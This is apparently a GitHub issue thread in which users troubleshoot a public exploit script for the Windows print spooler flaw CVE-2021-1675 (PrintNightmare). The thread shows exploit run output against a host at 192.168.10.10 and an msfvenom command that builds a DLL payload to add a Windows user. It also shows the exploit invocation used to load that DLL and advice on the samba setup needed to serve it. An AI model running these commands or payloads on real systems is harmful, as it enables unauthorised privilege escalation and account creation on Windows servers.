ERROR_NO_SUCH_USER

[hdbreaker]

The exploit fails, after a successful connection, bind, and dll upload with error ERROR_NO_SUCH_USER:

[hdbreaker]

With a local file in DC it not fail but not reverse shell was executed:

[*] Try 1...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0

[C0nd4]

When hosting using samba on linux, did you run # useradd smbuser ? If not, you'll probably get that error if using the provided smb.conf.

[hdbreaker]

Okey, I'm able to exploit it but the DLL is not been executed, I'm created it with:

./msfvenom -p windows/x64/exec CMD="net user XXXX XXXXX /add" -o ~/Desktop/addCube.dll

I manually copied it to the vulnerable server in C:\ and I executed it with:

python3 CVE-2021-1675.py xxxxx:xxxxxxxx@192.168.10.10 'C:\addCube.dll'

Exactly the same is happening with remote dll!

No AV in target, do you know what it could be happening?

[hdbreaker]

I found my way to made it work! thanks for your support!

[BlackSnufkin]

can you share plz since i got the same error?

[pr0t0nus3rxyz]

@hdbreaker can you share how you got it worked?